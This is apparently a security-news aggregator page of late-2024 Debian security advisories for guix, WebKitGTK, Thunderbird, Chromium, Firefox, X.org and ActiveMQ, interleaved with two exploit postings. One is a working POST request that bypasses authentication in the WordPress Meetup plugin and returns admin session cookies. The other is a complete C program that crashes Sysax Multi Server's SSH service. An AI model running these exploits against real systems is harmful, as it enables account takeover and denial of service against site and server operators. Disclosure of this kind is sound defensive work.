Debian Linux Security Advisory 5805-1 - It was discovered that the daemon of the GNU Guix functional package manager was susceptible to privilege escalation.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5805-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : guix  
CVE ID         : not yet available

It was discovered that the daemon of the GNU Guix functional package  
manager was susceptible to privilege escalation. For additional  
information please refer to  
https://guix.gnu.org/en/blog/2024/build-user-takeover-vulnerability/

For the stable distribution (bookworm), this problem has been fixed in  
version 1.4.0-3+deb12u2.

We recommend that you upgrade your guix packages.

For the detailed security status of guix please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/guix

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcuaRAACgkQEMKTtsN8  
TjZa/Q//eoPkJt2H3eEwYAqg8KGN0HD6rJpNNIznSbFIbjBCy/Dojt1YbA/3f7LC  
K4dFp6eQo59drzf2EYVyiBL3a8kXHmAa+HxCY/n//fmBBN/IzkhbXEkAfiCo5wH1  
ICGb3AgNHL2q1+OllyV4PPdwo6YS97/tmUXD3rkr29yX2D8eJ3Iwyf2f9JqBMc7J  
KyBTTYHk9BS0b7XqdkyYJ69WcMNEDa6peCXp11Ebvh6Zk0jo5zoYO8INzNszquKr  
oyI37gEOfrEV2jzWrQCNoHeF5pz9EE5aSXrxSAPOPgkAQ4Y933tVVLoUBMHWCasz  
rTS1rPPAf85V2QqAz5nHk05B4Q3v8WKhd+t0pnpLO87QXLIoas1mUUYPnwzI662i  
aed//ld1LSyDkErVeXWmS5AIW2k/Z7eabmUc23MfSwgdkkBBbZz9T0Ms4VdIKyCZ  
eHv6EwAt6hIXGycwuCLLGUag4q6FMMBFCAuNsBMoLn+8XbIiQImAax/0inlmuqQb  
svuVk5UFp1mycwvSxZhNRm6bI1H4Q1zXFYhAE1VC1CCv9Rw/ZNySHEFRBLpUUcJj  
zdkED2qh8LsigrUfxA7XXE+KIDoFzV865zNRBECxasjnVXSbQiG7R5kHx7kAPHRk  
FWb+efJZbHSFSvvg9pWXRSPqYdCA7Mm+gsouvPyloVNAdo6R6yQ=  
=j+rv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5805-1

Debian Linux Security Advisory 5804-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher, Q1IQ (@q1iqF) and P1umer discovered that processing maliciously crafted web content may lead to an unexpected process crash. Narendra Bhati discovered that processing maliciously crafted web content may prevent Content Security Policy from being enforced.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5804-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
November 07, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-44244 CVE-2024-44296

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-44244

    An anonymous researcher, Q1IQ (@q1iqF) and P1umer discovered that  
    processing maliciously crafted web content may lead to an  
    unexpected process crash.

CVE-2024-44296

    Narendra Bhati discovered that processing maliciously crafted web  
    content may prevent Content Security Policy from being enforced.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.46.3-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmctQfgACgkQAAyEYu0C  
2AL3Mg/+KPh5Bj+N8lUDa9rOwqVs81RdgLwAO2ejoPCdbdL9bC/u03cOaSYckPZ6  
399gXtnD0Fmkg8VIom+XmROOKhNVik4pfrtMVvGpQrguqUm8GURYjGxtw7+ZG5fD  
3QYsAa7r3RCDoN5d2R5CqFplEiwlrZFDrYPACyoXHoRjNjut168sPmKbXqyZoE/t  
p3+16lvRbnJSIdoa2Nu1b8DFuXzHjpShFUW1LtYI/Nn4Civ+gJhi7YajgaKk5b/x  
BEo5dBgBDsWrMbGaOFj5m0w+RwE6dMSx+a7eUheUXHIXH6UBg6i6/tFTgxWrf8dD  
gm+dR0tH69BJyh1KrQYpgBKG1h0yDGI1huRr82m92RQLk9zV73qGlBMlMNLJoOaI  
5QGgVlyg+T2A+taagg+Q1uIPVIpn3FcETgD1W76+eRjACBe4yp27UiV/+78IOkR0  
WkmHRLXLUmPygbuzbxhRfI43y7NKRjkW1WXW66i7sQZHxiRpniCIUwlGcR9JICxm  
uTgJPVxxGh6HNG3khT/MwOTrCkAJufnOvG4cLrK5G0Kht6ocdZ26Sjqb4tbpxuwN  
0UrusBSXeRT2i7y6r8ZUm5n9e5+bCHvKTz+tTSpCoDYgJchQNTEWqxFyG5Fk7rbD  
oLeDB0ZAeLxGrdUoeVTT+lMCQ8l8DRquST5tP61X9aFofifnR6c=  
=OxJE  
-----END PGP SIGNATURE-----

Debian Security Advisory 5804-1

WordPress Meetup plugin versions 0.1 and below suffer from an authentication bypass vulnerability.

    # CVE-2024-50483Meetup <= 0.1 - Authentication Bypass via Account Takeover# Description:The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.```CVE: CVE-2024-50483CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS Score: 9.8Slugs: meetup```Note: You need to know the users email address you want to login as.POC---```POST /wp-admin/admin-ajax.php HTTP/1.1Host: kubernetes.docker.internalContent-Type: application/x-www-form-urlencodedContent-Length: 149action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/```Response--```HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 21:37:23 GMTServer: Apache/2.4.57 (Debian)X-Powered-By: PHP/8.2.13X-Robots-Tag: noindexX-Content-Type-Options: nosniffExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Referrer-Policy: strict-origin-when-cross-originX-Frame-Options: SAMEORIGINSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnlySet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnlySet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnlyContent-Length: 0Content-Type: text/html; charset=UTF-8```

WordPress Meetup 0.1 Authentication Bypass

Debian Linux Security Advisory 5803-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5803-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-10458 CVE-2024-10459 CVE-2024-10460 CVE-2024-10461   
                 CVE-2024-10462 CVE-2024-10463 CVE-2024-10464 CVE-2024-10465   
                 CVE-2024-10466 CVE-2024-10467

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

Debian follows the Thunderbird upstream releases. Support for the  
115.x series has ended, so starting with this update we're now  
following the 128.x series.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:128.4.0esr-1~deb12u1. This version is not yet available for  
the i386 architecture.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcqaX4ACgkQEMKTtsN8  
TjZR6g//Yz5oKGY25G4T1qqpgNVKnbG2otH7lPRL72lZVjtOHGuM+l3h5aHDEeJZ  
igF15ChM7XGlBht/tZmvSFYxMGEnBdYehzyVEX7ZXM1hK3R31mG/X7x8BVEdzo+i  
BflYPp4of4AFfJlxFgV0NsySHN0k411syCtl2Q0+hu9yyM1nPQbLzPbalnkT+pNl  
80Q88g3XQrT4mjlscJeTnHOhIgfZxmVMIjFd8W31RhGuVe3QnN/bjaApdr37D65p  
XEomoOIRwRhE6AmwCIBv0spepS8QmfxN7h1MRXh4u6Wdca2/Y7jD959pN+m8MmDF  
o0FUBetZt0sgo6qMpnaaMBEpIQbQT9uTt4gA88HdNULc7CTqDBj/oWoruqDiNd/f  
6I4n2fOoBfeo/voZlzvhX16veRcuLa3HZ60ifnxYmUPUoOKAqRTO/LqOdhCm6nm6  
A/hAmAoG3GspVcUO+im6hi+2NBjxaj3XdX9O7L1k5fuavRq256v+9XIUv1iSlOtY  
Kk7XcrGST9mnf5iGTXsDC7P28Wy2+mFFZV1T/+Z6Y1a8bPY3MZ6RPIZk+I19W+Gw  
cCJwJ92uaFMKB9zrRaPuAEfnRzP0piHJxgX+vvEC8k7RbHlepuPfD5548WCjAf1b  
g+X4HyW0Hlv9dXTRqY1YpDBCh5J77P7b7dakmFR9Yutaxv5ldlQ=  
=qixK  
-----END PGP SIGNATURE-----

Debian Security Advisory 5803-1

Debian Linux Security Advisory 5802-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5802-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 03, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-10487 CVE-2024-10488Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 130.0.6723.91-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcoAE8ACgkQZF0CR8NudjeqxQ/9Ez3gP1lKx7QLfaDgGC2gM4hvIArxdDqZoYA51dyoESodokmzVQeJ15uyUhMWs1j46/vpXpPiUv7GJnk4ib8fqw7Ybb2AEY/bJh/TkL9iTTrTbax4I2U8wV/P/QPs/vz/cgLmGP/SwzbRIkudQb9eJZbArC5a0T78wtjb+miOkvC3JDuOSpThuVpk59H4ppXRNht9XV1BlCz8kgtQuR01EMYP0+hochN6h/XzBD9YgZ2BDwltEpMjDzOaqH4la1WmgKgPwovFF0hZXVz4ttxN8elhkS6V8B9tYX0QihEudKe6iAcmzaAGKH+U7mPTacBps3xt5SPTGHwBCJ7uhsDNwePp2Pe0Xq7coKIicFLq9qKeUDipq4PVWD6UzKZ5+UVhoLBayzlBe/3HSmRbBjWsBnQY5ntOAzqK3Q2/m6JhA7PzFFO43UzhVi70wXGZwhDZqeCVEzXUB3xwmzD7vib8rBCBm08Zr73wHWDsq6kbnYDvf1KPlXNio2OS2NlIcBM6AjQgZg5U+4m4EPNSsONSbU9OtEtvVBuWbFISPVCTRFFb2JPK4XGzQ+tdipfZJ3qmhU39IL2NqGncMoZnwTB1w/HutIBwNb6yA8MBvzARLcb3pi3tstg0Yc754a9W6D534BcYiTPcWlgxd+La5RZs+oWvHJ2LKS1saDQ662G8r5A==sXh5-----END PGP SIGNATURE-----

Debian Security Advisory 5802-1

Sysax Multi Server version 6.9.9 suffers from an SSH related denial of service vulnerability.

    # Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: Sysax Multi Server 6.99# Tested on: Windows 10 x64#Steps --> Compile (gcc -o ssh ssh.c)#Steps --> Run (sudo ./ssh <Target IP> <Port>)#Steps --> Crash (SSH Crashed)#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <arpa/inet.h>#include <sys/socket.h>#include <netinet/tcp.h>void error_handling(const char *message) {    perror(message);    exit(1);}int main(int argc, char *argv[]) {    if (argc != 3) {        printf("Usage: %s <IP> <Port>\n", argv[0]);        exit(1);    }    const char *host = argv[1];    int port = atoi(argv[2]);        unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,      0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,      0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,      0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,      0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,      0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,      0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,      0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,      0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,      0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,    0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,    0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,    0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,  };  int sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock == -1) {        error_handling("Socket creation failed");    }    int flag = 1;    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));    struct linger sl = {1, 0}; // Close immediately    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));    struct sockaddr_in serv_addr;    memset(&serv_addr, 0, sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_addr.s_addr = inet_addr(host);    serv_addr.sin_port = htons(port);    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {        error_handling("Connect failed");    }    const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n";    if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {        error_handling("Failed to send SSH banner");    }    usleep(100000);     for (int i = 0; i < 5; ++i) {        if (send(sock, packet, sizeof(packet), 0) == -1) {            error_handling("Failed to send payload");        }        usleep(50000); // Short delay between sends    }    printf("Payload sent successfully.\n");    char buffer[1024];    ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);    if (bytes_received > 0) {        buffer[bytes_received] = '\0';        printf("Received response: %s\n", buffer);    } else {        printf("No response received or connection closed.\n");    }    close(sock);    return 0;}

Sysax Multi Server 6.99 SSH Denial Of Service

Debian Linux Security Advisory 5801-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, cross-site scripting, spoofing or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5801-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 31, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-10458 CVE-2024-10459 CVE-2024-10460 CVE-2024-10461                  CVE-2024-10462 CVE-2024-10463 CVE-2024-10464 CVE-2024-10465                  CVE-2024-10466 CVE-2024-10467Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, cross-site scripting, spoofing or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.4.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcjhjMACgkQEMKTtsN8TjbUdw/+M/mtjyJ4H/OjhGZdzDOsjIzCTR3FDRrNXuh7j7fjLcd+q6vSLrAZEqhFSnx2oJ3UtLX9IUxkfqBG425XZ1E3EPd9rxFuKy7uSHFqhbXp+h5sEahf3r9Jyf6v6JKfo7TBBZ/ycr3uix1GtFGcbhkrmXZuNWUuz33w4QQS+3O00Ukbsm6UhE4pdXHMnTesJN77kKRepX0W8/Y8wOg0+8MVBTBhKPfISf94x+shWxBpMrCj80lDvoZ6y3sO/VgtcwMBgcvo8le6nvetyzyOt2syiE65qFlMvSG9niT+1wdiv42tRMqjLwvfxF5GpkiFF8N7p6bD11SAxiywBU/60/WGTIE0MIWlifKzUeed5Xs84xk3mvKc8mZ9Z/WuGcIHJEY8tS1R8KcDfwnKRdYobtMyBUgb6WJNvobUWkGT3nS/ml2dSLs5Pjd3ulmMELhG0xsH+YuG0MceSFjuA9HJqCYZ3a/Q5i2jyUIj+RkivVxBVwsM5BYJlVYl7CaPTxbARJEK7QtjrURFnOu57M+T+AsNx+xjIRzouWN1bAXQT49VgViVFtH7jkpc1rbXV74s8IkYi50ED0Ny9rdN6HAahSlrt5TmIccYhaiQZCDEPAC5J6OpE30MXGoCAYcW2/4e9oiIwrVjw1m+ePt1U1yD+20k7i2W1LB2T0e7pwaFl2FgR+k==Tz4t-----END PGP SIGNATURE-----

Debian Security Advisory 5801-1

Debian Linux Security Advisory 5800-1 - Jan-Niklas Sohn discovered that a heap-based buffer overflow in the _XkbSetCompatMap function in the X Keyboard Extension of the X.org X server may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5800-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 29, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2024-9632  
Debian Bug     : 1086244

Jan-Niklas Sohn discovered that a heap-based buffer overflow in the  
_XkbSetCompatMap function in the X Keyboard Extension of the X.org X  
server may result in privilege escalation if the X server is running  
privileged.

For the stable distribution (bookworm), this problem has been fixed in  
version 2:21.1.7-3+deb12u8.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmchKQNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S1og//Qc+fk1SZNKINd1d/ItoR5XQQGU4V92/kQKcfNu97F2DLcb1wUc+BZAaY  
yr1HS+ru3pY25XOKYLgR7Tx///BEXzYxKdNxLGVMXzJqU06oSYXAkUBERFW5aU0/  
ayaV+UtwaX7ADUwYpCeJbQJcudMw3YtPlkRpN1uCs/lHMHPcbsGpZt4VBpItksrs  
iRpqq40eQiPafzGBpzx40ejaJyn200s9hYNN6dieqNDQTW6MmGSI9OLfY5alze6M  
Iot3mopREg/iKJblNz7+T2mKng0TEPY2PgolcsmHjvHEKCrWmWcGKwWHKlbvfpJX  
s1522AAWS5aJeW8r6TeGbOa298caLsW4doQa/6EX4HeADQu7SjV9oXZwrUtGsCxn  
eb6oLUGhHs0FGmY/Hvfng/ouZwSj1wKWE45hMCJ1HRSlpbfCoJxQlFpNLWQziFaS  
TuzebmpPXfbrbcXb7tNgUPtLcayu09JwJWxZLYPYcFDXZe1wUz3ZQIWkKHizXkSI  
NZtQYdLMKqBp99XR65vkTORS7QWkpdaW6AY6JujoihKFzh+wRM7qKtgflHl6qTLd  
mPK8DU/qe5jCs5oqzLvQ7sZUb95JqhYaLf8ZWH6koTHLHqnMt9wOxqoEPoFfk4Lz  
TH0FizIOHO6imr6USG+ubOtlf/nd1py1achR9ihKtd+0GE0Hx8Q=  
=Y9nq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5800-1

Debian Linux Security Advisory 5799-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5799-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-10229 CVE-2024-10230 CVE-2024-10231Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 130.0.6723.69-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcfKnwACgkQZF0CR8Nudje0sBAAsYJO23wXH5WDVCouanWuxcBKHrXDSF0RrlPOQP5tJURzc8teVhQodU6aohwckqSyCeYI3/z6NvfVcZFOWVlNQLktcNo8nWw7pMTMkhynk9OA3KCR/LDA3b6TIZxW3z55Sza4TkcJrj+DIUgBFRBzQvFolwP6MRMcjI+kT4To9YemZlED8ZlhtNt4/abKD2suwV5nyzRFPh14sgujtwuF/zPNivuHMQFXNwWfnbIBmJlC+3XO3Ox1IVZ3IcN2tCWM0hvtkGOCOA5e3OXUGuLgWdQWg0J/hlZ8wYwlamDutp/BS3zPxurshDrEY1WOgb7oSl2rM3IgitsnHyyccICgasto7vlYpKJBCfhXDyuR00a+Sfihn91hT2lCodp8x6HazMD8HxutTa+xiihBFgKON/NFK2GvS0EbaCUe5lQe893y7cBAYhHwliXmKuL+9D/H53+UhPJSE97ZOvsLoopTzk2+cgInstHfX1SpNR4rPKN5Sk0VxDbnDiKuSUmPOGqG4xnWLhg9g04lWWNB34nHkq8cPLfGDd0erk8GHHX7/PYTqlLf8cmJppnwNoZffi3B6mk/zbwPCMVaM8odDL9Pc41zooLCGkykglmR6Yw/xbdC9+vrlsFJ/O2ligILTl/9Yf5ZaxemdcE/QEv65VyoYIDs7BkXcpgRIMqo55l5FTI==Rr/n-----END PGP SIGNATURE-----

Debian Security Advisory 5799-1

Debian Linux Security Advisory 5798-1 - Christoper L. Shannon discovered that the implementation of the OpenWire protocol in Apache ActiveMQ was susceptible to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5798-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 26, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : activemq  
CVE ID         : CVE-2023-46604

Christoper L. Shannon discovered that the implementation of the OpenWire  
protocol in Apache ActiveMQ was susceptible to the execution of  
arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 5.17.2+dfsg-2+deb12u1.

We recommend that you upgrade your activemq packages.

For the detailed security status of activemq please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/activemq

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmccx3gACgkQEMKTtsN8  
TjY5bg//ZDPT1SXTCW7reOmPv3i1J7I8Cv8rNkogL73R1SBE+1C5CutQzAESJkid  
0BzW+q9A2qVvDyxgM8pcxuYI53olVH8fPzDViHYit4K4Ac0o66fmfA42ipC21sNd  
it9Zo1WROyYenvLvGEx4bQXL8UamoVpMCIy/2o5t0b60P5glOjjfqHJadRbvZgJA  
QvdD3UTASnsrqWgf5+4HON9nUBjNJL9cdPkxPkskBVAYJrMpLvNEvkofcB1YIPgs  
UW0UwNJe50CCddeDhOY59nO1m0TAG0gbgEgPJ3U2Zasdou2OqTRFp7wt0RBwmvFW  
wikkyRqfg0sZM4bDZIz74c58qJRd2dJBIShTBQiXB2qcX3v7tNUp+2cVjUUhZq3d  
jXIS1uupmpn4MVIA5CgLFsBsoOzg+Zn7WxXNMih0CIUAUWLmGPrMRiinm4rB81t1  
1zOMpaRByCuO1Tnc03dDaX0sl5ydWc+O2nkRxsWowXXGw/UDMSdNbrLmr/kJwNnR  
cmePkv6PPLBznTWpuk9elriYLn2D8VLvRHx2TGj+W21Qky4QOYUVYVpHgHYW5GpE  
4jkrozdb/GhUUN7QIqssmJzyXGNUBKf+7DBPBUqmV2Pcvp5uNa1s3J0zanP6OKda  
dfnlfI6Ov8WH3O/P60suZF8QBvlRvjnscNaC9HUVZ/ROqgy7MFo=  
=JXv0  
-----END PGP SIGNATURE-----

Tag

#debian